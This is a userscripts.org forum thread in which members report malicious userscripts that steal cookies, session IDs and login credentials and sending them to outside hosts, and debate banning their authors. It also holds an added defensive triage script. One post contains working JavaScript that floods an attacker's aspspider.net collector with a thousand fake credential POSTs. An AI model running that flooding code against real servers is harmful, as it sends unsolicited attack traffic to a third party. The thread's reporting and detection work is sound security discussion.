Cookie Stealing Scripts

in Userscripts.org discussion
209 posts, 115 voices



sizzlemctwizzle Scriptwright
FirefoxMacintosh

Daren wrote:
#1 So after 2+ years of posting about these problems, the root problem still exists?
The problem will always exist. The only solution would be setting up a review system like the one Mozilla does for addons, but that would be more hassle than it's worth. Your best option is to trust the community to report scripts that are malicious. Also you could just only install popular scripts (lots of downloads, fans, high ratings, and discussions) since they are less likely to be malicious. Also if a scriptwright has one of these popular scripts, it's probably safe to assume his other scripts are safe. Just be a vigilant/smart user basically.
Daren wrote:
cookie-stealing still available for download
Yeah I don't know why the ones that have been identified haven't been removed.

 
used-car-parts User
FirefoxWindows

Newbie here. The review system sounds good. I've seen several good sites do that and it's a great way to let people know the pros and cons of the script.

 
donovanagano... User
FirefoxWindows

ghhhhhhhhhhhb

 
Marti Scriptwright
FirefoxX11

This user in this script claims stealing of site related passwords. So far from what I can tell none of the scripts posted by this user are his and may be "dirty".

 
Luzifull22 User
ChromeWindows

yess OL Thankss!

 
Marti Scriptwright
FirefoxX11

This user in this script with this version includes a @require to a questionable script with this version that appears to compromise identity and privacy by canvasing a google page that has been provided by Google, Inc. specifically for this purpose. Used in combination with [this addon](https://addons.mozilla.org/en-US/firefox/addon/Sticklet/) on AMO along with Greasemonkey. This "feature" (a complicated web-bug) is undocumented on all of the script/add-on homepages.

Jesse Andrews wrote:
I'm putting up a banner to warn people that newly uploaded/updated scripts should be put under extra scrutiny.
I recommend this even for older scripts too... good advice! :)

 
Marti Scriptwright
FirefoxX11

SuperCanan posted this malware with this version.
Script sends off hotmail/live and facebook user/password to a 3rd party by eavesdropping on login pages.

 
Marti Scriptwright
FirefoxX11

Melkor posted this malware with initial version.
Script takes sessionid data and sends it off to a 3rd party. here


La Larva posted this malware with this version
This one also has similar review... call to server doesn't appear to be present but sessionid does appear to be sent elsewhere.

These two will probably need some in-depth examination.

 
ameboide Scriptwright
FirefoxWindows

Marti wrote:
SuperCanan posted this malware with this current version.
Script sends off hotmail/live and facebook user/password to a 3rd party by eavesdropping on login pages.
Good to see that the script was removed, but why wasn't the user banned? If distributing obvious malware isn't worth an instant ban, what is? And not only that, but just a quick look at his other scripts shows that all of them do the same (I presume it's even the same code that was present in the deleted script)

 
Jefferson Scher Scriptwright
FirefoxWindows

3ICE posted about another one:

Someone stole my script and inserted malicious code into it. 56 people affected.
https://userscripts-mirror.org/topics/94059

Suspect script: Youtube Link OptimizerX
https://userscripts-mirror.org/scripts/show/118278

I added a couple of discussions there.

 
Cletus Scriptwright
FirefoxWindows

Jefferson Scher wrote:
3ICE posted about another one
Seems like it is more than just that one.
Here is a customized search that catches a total of 31 scripts that have that chunk of code in it: https://userscripts-mirror.org/search...

Edit: here are clickable links to make it a bit easier to keep track of.


 
sizzlemctwizzle Scriptwright
FirefoxWindows

@Cletus

Your link doesn't work. Here's a [Google search](http://www.google.com/search?q=%22http:%2F%2Ftotalfi%22+site%3Ahttps%3A%2F%2Fuserscripts-mirror.org%2Fscripts%2Freview%2F&pbx=1&oq=%22http:%2F%2Ftotalfi%22+site%3Ahttps%3A%2F%2Fuserscripts-mirror.org%2Fscripts%2Freview%2F) that returns 31 results.

 
Jefferson Scher Scriptwright
FirefoxWindows

This is why everyone should run NoScript. (If you can tolerate constantly investigating and approving things. Maybe even if you can't...)

 
Cletus Scriptwright
FirefoxWindows

sizzlemctwizzle wrote:
Your link doesn't work.
Whoops, fixed.

 
Marti Scriptwright
FirefoxX11

ameboide wrote:
Good to see that the script was removed, but why wasn't the user banned?
It is possible that the respective users deleted their scripts too... but as far as banning goes related to these... this is newer territory... I don't know what the general consensus on appropriate actions is yet... till then I'll report and recheck occasionally.

 
cqrt Scriptwright
ChromeWindows

This script caught my attention as it is using, verbatim, the description for my popular Google Reader Sanity userscript. It's called Google Reader by user vdk and its source code reveals that it is the complete uncompressed source of jQuery and nothing else except for some additional foreign code at the bottom. I'm aware of the totalfilehosters.co.uk cookie stealing userscript, but this seems to be something different, loading code from '[http://aspspider.net](http://aspspider.net/)' which is 'free' ASP hosting, can anybody identify what it's doing? The same author also has the same code in this script.

 
Jefferson Scher Scriptwright
FirefoxWindows

cqrt wrote:
... I'm aware of the totalfilehosters.co.uk cookie stealing userscript, but this seems to be something different, loading code from '[http://aspspider.net](http://aspspider.net/)' which is 'free' ASP hosting, can anybody identify what it's doing?
I don't use jQuery, but this syntax should find all of the <input type="password"> in the document:

$(":password")

That, plus posting it to some site other than the site the user is visiting, is all I think one needs to know about this script!

I posted a Discussion on each of the two scripts, and voted it harmful. I suppose for greater visibility, they need bad reviews...

 
Marti Scriptwright
FirefoxX11

vdk posted this malware with this version.
Script needlessly runs on all pages and potentially steals DOM inserted user/passes.


vdk posted this malware with this version.
Script needlessly runs on all pages and potentially steals DOM inserted user/passes.
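
The signals reviewers name in the posts above (a password-field selector, data sent to a host other than the site being visited, a script that runs on all pages, an unreviewed @require) can be checked mechanically before installing a script. The following is an added example, not part of any post in this thread and not code from userscripts.org; the function names, the regexes and the `collector.example` sample are assumptions made for illustration.

```javascript
// Added example: heuristic static triage of a userscript's source text.
const SOURCES = [[/document\.cookie/, 'reads document.cookie'],
  [/:password|type\s*=\s*["']?password/i, 'selects password fields']];
const SINKS = /XMLHttpRequest|GM_xmlhttpRequest|\.ajax\s*\(|\.post\s*\(|new\s+Image\b/;
// Parse the ==UserScript== metadata block into { key: [values] }.
function parseMeta(src) {
  const meta = {};
  const block = (/\/\/\s*==UserScript==([\s\S]*?)\/\/\s*==\/UserScript==/.exec(src) || [])[1] || '';
  for (const m of block.matchAll(/^[ \t]*\/\/[ \t]*@(\S+)[ \t]+(.*\S)/gm)) {
    (meta[m[1]] = meta[m[1]] || []).push(m[2]);
  }
  return meta;
}
// Host part of a URL or @include pattern; '*' when the pattern names no host.
function hostOf(pattern) {
  const m = /^[a-z*]+:\/\/([^\/:]+)/i.exec(pattern);
  return m ? m[1].toLowerCase() : '*';
}
// True when host equals, or is a subdomain of, one of the script's declared hosts.
function covered(host, scopes) {
  return scopes.some((s) => {
    const base = s.replace(/^\*\./, '');
    return host === base || host.endsWith('.' + base);
  });
}

function triage(src) {
  const meta = parseMeta(src);
  const body = src.replace(/\/\/\s*==UserScript==[\s\S]*?==\/UserScript==/, '');
  const scopes = [...(meta.include || []), ...(meta.match || [])].map(hostOf);
  const sources = SOURCES.filter(([re]) => re.test(body)).map(([, label]) => label);
  const net = SINKS.test(body);
  const hosts = (body.match(/https?:\/\/[^\s"'<>)]+/g) || []).map(hostOf);
  const foreign = [...new Set(hosts)].filter((h) => !covered(h, scopes));
  const findings = [...sources];
  if (!scopes.length || scopes.includes('*')) findings.unshift('runs on all pages');
  if (net) findings.push('makes network requests');
  foreign.forEach((h) => findings.push('hard-coded foreign host: ' + h));
  (meta.require || []).forEach((r) => findings.push('@require needs its own review: ' + r));
  // Escalate only when a sensitive source coexists with a way to send data out.
  return { findings, review: sources.length > 0 && (net || foreign.length > 0) };
}

// Constructed sample, not taken from any script named in this thread.
const SUSPECT = `// ==UserScript==
// @include  *
// ==/UserScript==
$.post("http://collector.example/x", { v: $(":password").val() });`;
console.log(triage(SUSPECT));
```

A `review: true` result is a prompt to read the source by hand, not a verdict; obfuscated code, or a host assembled at run time, will not match these patterns.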

 
ameboide Scriptwright
FirefoxWindows

Jefferson Scher wrote:
(...)
I posted a Discussion on each of the two scripts, and voted it harmful. I suppose for greater visibility, they need bad reviews...
No, they need to be deleted and the user(s) permanently banned.

I really don't understand what's to ponder about this. Spammers get promptly (sort of) banned for posting useless links in the forums; yet users who maliciously release obvious malware, steal cookies and passwords from unaware people, and even do so disguising it as other people's scripts, receive no sanction at all, and their harmful scripts remain there to be installed.
Maybe if this thread was hidden deep inside an active forum there would be a reason for not taking action, but this is the only sticky thread besides the spam thread (that does receive some attention) in the main forum of the site, which receives like 3 posts a week besides spam and complaints about spam, so it's not that hard to notice...

 
Jefferson Scher Scriptwright
FirefoxWindows

ameboide wrote:
Jefferson Scher wrote:
(...)
I posted a Discussion on each of the two scripts, and voted it harmful. I suppose for greater visibility, they need bad reviews...
No, they need to be deleted and the user(s) permanently banned.
Yes, that's true. I was referring to what we non-admins could do ourselves.

 
ameboide Scriptwright
FirefoxWindows

I'll just leave this here...

var c = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXTZabcdefghiklmnopqrstuvwxyz";
var cl = c.length;
function rand() {
	var l = 6 + Math.random()*6;
	var rand = '';
	for (var i=0; i<l; i++) rand += c.charAt(Math.random() * cl);
	return rand;
}

var hosts = ["www.facebook.com", "twitter.com", "mail.google.com"];
var xmlHttp = new XMLHttpRequest();
var n = 1000;
while(n--){
	var userName = rand();
	var passWord = rand();
	var hostLocation = hosts[Math.floor(Math.random()*3)];
	xmlHttp.open("POST","http://aspspider.net/abc123abc/Default.aspx?Account=" + "host: " + hostLocation + "     " + "username: " + userName + "     " + "password: " + passWord, false);
	xmlHttp.send();
}

 
Marti Scriptwright
FirefoxX11

@ameboide,

I understand your concern quite well. You need to give the other admins time to investigate and if you reread this post you might understand a little bit more about identity theft. I don't have all the necessary time to check every post and script on USO myself but when cqrt posted the reviews I caught it immediately and did my part... the more appropriate attention that is drawn to an issue the more the community can interact with it so the appropriate people can make an informed decision. We all can't be online 24x7 so it is a teamwork effort and some of us only get paid for our day jobs. :P ;)

I've already been seeing cookies altered but not transmitted as of late and some of those scripts are valid. uso - Count Issues for example is a cautionary script notification system to alert a potential end-user installer that there MIGHT be an issue... sometimes there isn't.

Assuming here that you are using Greasefire... I would strongly suggest that you don't click its native install button (This is one of my pet peeves with Greasefire but I don't foresee them changing it anytime soon unfortunately.) and go to one of the other links in the browser window that it brings up. This should kick you to the actual browser content window instead so you can review it. :)

 
Jawz74 Scriptwright
ChromeWindows

Hi,
This script (https://userscripts-mirror.org/scripts/show/119339) is sending game data to another location than the game server.
Please remove it. Thanks.

@Marti : Concerning the script posted by La Larva, the "DOA Power tool by Teamwork" is using the game server URL taken from the flash parameters to send the requests. In the script, there's only one location where you can find a "new XMLHttpRequest" and the URL used is always composed with the game server URL. No other request is sent to another server.

Regards,

 
Marti Scriptwright
FirefoxX11

3lch1M4n posted this malware with this version.
Pretty obvious by the @description and sends user/pass data off to a third party.

 
pearlheartgtr User
FirefoxWindows

This script, https://userscripts-mirror.org/scripts/show/117369 also started a Google Redirect fiasco with adf.ly every time I clicked on something in a search.